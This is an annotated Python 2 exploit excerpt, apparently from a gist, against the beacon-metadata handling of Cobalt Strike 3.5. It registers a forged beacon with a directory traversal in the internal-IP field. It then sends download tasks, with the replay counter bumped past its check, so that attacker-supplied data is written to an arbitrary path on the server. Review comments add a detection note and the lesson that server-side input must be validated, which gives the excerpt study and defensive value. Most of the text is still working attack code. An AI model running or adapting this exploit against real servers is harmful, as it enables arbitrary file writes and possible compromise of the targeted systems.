Retired Cobalt Strike 3.5 exploit example
# NOTE(review): retired exploit against the beacon-metadata handling of
# Cobalt Strike 3.5 (see the gist title). Kept for its defensive value: it
# shows which client-supplied metadata field carried a directory traversal
# and which beacon response types ended in a server-side file write. The
# helpers used below (generate_keys, Metadata, register_beacon,
# build_download_task, beacon_checkin, build_download_data, counter) and
# the `args` namespace are defined outside this excerpt. Python 2 syntax
# (print statements).
# First we need to register a beacon with a directory traversal in the ip address field
# The traversal prefix is followed by the directory part of args.filepath; the
# server-side lesson is that every beacon-supplied metadata field must be
# validated/canonicalised before it takes part in building a path.
# Detection note: a beacon metadata record whose IP field contains path
# separators or ".." is never legitimate and is worth alerting on.
ip_address = "../../../../../../%s" % os.path.split(args.filepath)[0]
# Generate symmetric keys (used later)
# raw_aes_keys is the 16-byte per-beacon secret that is also packed into the
# metadata below; generate_keys derives the AES key and the HMAC key from it
# (the derivation itself lives outside this excerpt).
raw_aes_keys = os.urandom(16)
aes_key, hmac_key = generate_keys(raw_aes_keys)
# Build the metadata record for a version-3 beacon. All of these fields are
# chosen by the client, which is exactly why the server cannot trust them.
m = Metadata(public_key=args.public_key, cs_version=3)
m.public_key = args.public_key
m.bid = args.bid
m.pid = args.pid
m.ver = "10.0"
# The traversal string goes into the internal-IP field (intz).
m.intz = ip_address
m.comp = args.computer
m.user = args.username
m.is64 = '1' # 64-bit OS
m.barch = '1' # 64-bit beacon
m.raw_aes_keys = raw_aes_keys
m.calculate_aes()
# pack() produces the encoded metadata blob sent at registration.
enc = m.pack()
# register the beacon
print "[*] Staging beacon .."
register_beacon(enc, args.target, args.uri, args.host, args.ssl)
# Now we need to push a DOWNLOAD_START response to cause a file write
# Only the file-name part of args.filepath is sent here; the directory part
# was already smuggled in through the metadata above.
print "[*] Creating file .."
data, fid = build_download_task(os.path.split(args.filepath)[1], aes_key, hmac_key)
# Send it to the server. This is the equivalent of touch(filepath)
# submit.php should be replaced with malleable C2 setting if applicable
beacon_checkin(args.target, 'submit.php', data, args.bid, args.host, args.ssl)
# Build another task which is going to write the data to the touched file
# We force the counter to be higher than the last task to avoid replay protection
# The counter check only rejects stale values; because the client picks the
# counter it does not authenticate the task contents, so it is no substitute
# for validating the file name and path on the server side.
print "[*] Sending data .."
data = build_download_data(args.filedata, fid, aes_key, hmac_key, counter()+100)
# Fire it..
beacon_checkin(args.target, 'submit.php', data, args.bid, args.host, args.ssl)
print "[+] Done!"